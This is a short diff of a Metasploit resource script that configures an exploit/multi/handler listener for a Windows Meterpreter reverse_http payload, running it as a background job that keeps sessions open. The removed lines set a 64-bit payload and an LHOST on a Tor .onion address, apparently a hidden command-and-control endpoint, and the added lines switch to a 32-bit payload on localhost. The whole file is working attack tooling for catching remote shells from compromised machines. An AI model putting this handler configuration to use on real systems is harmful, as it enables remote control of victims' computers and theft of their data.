--- a/set_msf.rc
+++ b/set_msf.rc
@@ -1,5 +1,6 @@
 use exploit/multi/handler
-set payload windows/x64/meterpreter/reverse_http
-set LHOST eubw6taemp4wg6ghsppt6cjxmruqh2b5u6ouqd2wc6qcemgciz3lkdid.onion
+set payload windows/meterpreter/reverse_http
+set LHOST 127.0.0.1
 set LPORT 4444
+set ExitOnSession false
 exploit -j -z
